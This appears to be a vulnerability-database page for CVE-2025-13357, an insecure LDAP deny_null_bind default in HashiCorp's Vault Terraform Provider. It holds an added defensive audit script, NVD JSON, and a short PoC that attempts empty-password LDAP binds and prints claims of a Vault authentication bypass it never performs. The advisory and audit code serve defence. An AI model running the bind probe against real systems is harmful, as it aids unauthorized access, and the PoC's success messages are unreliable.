Security Vulnerability Report
CVE-2025-13357 CVSS 7.4 HIGH

Published: 2025-11-21 15:15:51
Last Modified: 2025-12-10 21:00:48

Description

Vault’s Terraform Provider incorrectly set the default deny_null_bind parameter for the LDAP auth method to false by default, potentially resulting in an insecure configuration. If the underlying LDAP server allowed anonymous or unauthenticated binds, this could result in authentication bypass. This vulnerability, CVE-2025-13357, is fixed in Vault Terraform Provider v5.5.0.
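The defect is a silent default: with provider versions before 5.5.0, a `vault_ldap_auth_backend` resource that did not set `deny_null_bind` ended up with `deny_null_bind = false` in Vault, so whether a deployment is exposed depends on what is written in Terraform and on what Vault actually has configured. The following added example (not code from HashiCorp, NVD or the advisory) checks both sides from a defender's seat: it scans Terraform source for `vault_ldap_auth_backend` resources that do not set `deny_null_bind = true` explicitly, and it audits a Vault LDAP auth config response for the effective setting. The Terraform sample and the API response are constructed inline (the real `GET /v1/auth/<mount>/config` response carries many more keys); the mount path `ldap` in `fetch_ldap_config` is an assumption.

```python
"""Added example: flag Vault LDAP auth configs that rely on the old implicit
deny_null_bind default (CVE-2025-13357). Not vendor or NVD code."""
import json
import re
import urllib.request

# Constructed Terraform sample: "legacy" relies on the implicit default, which
# provider versions < 5.5.0 rendered as deny_null_bind = false; "hardened"
# sets the parameter explicitly, which is the corrected form.
SAMPLE_TF = '''
resource "vault_ldap_auth_backend" "legacy" {
  path   = "ldap"
  url    = "ldaps://ldap.example.com"
  userdn = "ou=Users,dc=example,dc=com"
  # deny_null_bind not set: provider < 5.5.0 wrote false here
}

resource "vault_ldap_auth_backend" "hardened" {
  path           = "ldap-hardened"
  url            = "ldaps://ldap.example.com"
  userdn         = "ou=Users,dc=example,dc=com"
  deny_null_bind = true
}
'''

RESOURCE_RE = re.compile(r'resource\s+"vault_ldap_auth_backend"\s+"([^"]+)"\s*\{')


def _block_body(text, start):
    """Return the text between the brace opening at text[start] and its match."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start + 1:i]
    raise ValueError("unbalanced braces in HCL")


def find_implicit_null_bind(hcl):
    """Names of vault_ldap_auth_backend resources that do not set
    deny_null_bind = true explicitly (exposed with provider < 5.5.0)."""
    findings = []
    for m in RESOURCE_RE.finditer(hcl):
        body = _block_body(hcl, m.end() - 1)
        # Drop full-line comments so a commented-out setting does not count.
        body = re.sub(r"^\s*(#|//).*$", "", body, flags=re.M)
        if not re.search(r"^\s*deny_null_bind\s*=\s*true\s*$", body, re.M):
            findings.append(m.group(1))
    return findings


# Constructed response in the shape of GET /v1/auth/ldap/config, abbreviated.
SAMPLE_VAULT_CONFIG = {
    "data": {
        "url": "ldaps://ldap.example.com",
        "userdn": "ou=Users,dc=example,dc=com",
        "deny_null_bind": False,
    }
}


def audit_ldap_config(resp):
    """Return problems found in a Vault LDAP auth config response.
    The effective value in Vault is what matters, whatever Terraform intended."""
    data = resp.get("data", {})
    problems = []
    if data.get("deny_null_bind") is not True:
        problems.append(
            "deny_null_bind is not true: if the directory permits anonymous or "
            "unauthenticated binds, an empty-password login would succeed"
        )
    return problems


def fetch_ldap_config(vault_addr, token, mount="ldap"):
    """Read the live config from Vault (not used by the offline sample);
    the mount path is assumed and needs a token allowed to read it."""
    req = urllib.request.Request(
        f"{vault_addr}/v1/auth/{mount}/config", headers={"X-Vault-Token": token}
    )
    with urllib.request.urlopen(req) as r:
        return json.load(r)


if __name__ == "__main__":
    print("Terraform resources relying on the old default:",
          find_implicit_null_bind(SAMPLE_TF))
    print("Problems in live config:", audit_ldap_config(SAMPLE_VAULT_CONFIG))
```

Running the Terraform scan in CI catches resources that only work by accident of the provider default; the live audit is the confirmation step after upgrading to 5.5.0 or adding the explicit setting, since Vault keeps whatever value was last written until the resource is re-applied.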

CVSS Details

CVSS Score (Secondary)
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

NVD Primary assessment (from the raw record below)
9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-1188 (Initialization of a Resource with an Insecure Default)

Configurations (Affected Products)

cpe:2.3:a:hashicorp:terraform_provider:*:*:*:*:*:vault:*:* - VULNERABLE
HashiCorp Vault Terraform Provider >= 4.2.0 and < 5.5.0 (fixed in 5.5.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13357 PoC - LDAP Null Bind Authentication Bypass
# Target: HashiCorp Vault with misconfigured LDAP auth method
# Requires python-ldap; the original "import requests" was unused and is dropped.
import ldap


def check_null_bind_vulnerability(vault_url, ldap_server):
    """
    Check if LDAP server allows null bind (vulnerable configuration).

    Note: this probes the LDAP server directly, so it shows whether the
    directory accepts an unauthenticated (empty-password) bind. Vault's
    deny_null_bind setting is what stops Vault from forwarding such a
    bind; vault_url is not used by this check.
    """
    try:
        # Attempt null bind with empty password
        conn = ldap.initialize(ldap_server)
        conn.protocol_version = ldap.VERSION3
        conn.set_option(ldap.OPT_REFERRALS, 0)
        # Try binding with empty password (should fail if deny_null_bind=true)
        user_dn = "cn=anonymous,dc=example,dc=com"
        try:
            conn.simple_bind_s(user_dn, "")
            print("[+] VULNERABLE: Null bind allowed - deny_null_bind=false")
            return True
        except (ldap.INVALID_CREDENTIALS, ldap.UNWILLING_TO_PERFORM):
            # Directories that refuse unauthenticated binds answer with either code
            print("[-] SAFE: Null bind rejected - deny_null_bind=true")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def exploit_vault_auth_bypass(vault_url, ldap_server):
    """
    Exploit authentication bypass in Vault Terraform Provider
    """
    # Step 1: Identify vulnerable configuration
    is_vulnerable = check_null_bind_vulnerability(vault_url, ldap_server)
    if is_vulnerable:
        # Step 2: Perform null bind to LDAP server
        conn = ldap.initialize(ldap_server)
        conn.simple_bind_s("", "")  # Null bind
        # Step 3: Use authenticated session to access Vault
        # Note: Actual exploitation depends on Vault configuration
        print("[+] Null bind successful - authentication bypass achieved")
        print("[!] Attacker can now access sensitive Vault resources")
    else:
        print("[-] Target not vulnerable")


# Usage
if __name__ == "__main__":
    vault_url = "https://vault.example.com:8200"
    ldap_server = "ldap://ldap.example.com:389"
    exploit_vault_auth_bypass(vault_url, ldap_server)

References

HashiCorp advisory HCSEC-2025-33 (Vendor Advisory): https://discuss.hashicorp.com/t/hcsec-2025-33-vault-terraform-provider-applied-incorrect-defaults-for-ldap-auth-method/76822

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13357",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-21T15:15:51.313",
    "lastModified": "2025-12-10T21:00:48.097",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vault’s Terraform Provider incorrectly set the default deny_null_bind parameter for the LDAP auth method to false by default, potentially resulting in an insecure configuration. If the underlying LDAP server allowed anonymous or unauthenticated binds, this could result in authentication bypass. This vulnerability, CVE-2025-13357, is fixed in Vault Terraform Provider v5.5.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-1188"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:hashicorp:terraform_provider:*:*:*:*:*:vault:*:*",
                "versionStartIncluding": "4.2.0",
                "versionEndExcluding": "5.5.0",
                "matchCriteriaId": "C152B8B1-F10F-4B82-AD90-6893D062EDC7"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://discuss.hashicorp.com/t/hcsec-2025-33-vault-terraform-provider-applied-incorrect-defaults-for-ldap-auth-method/76822",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}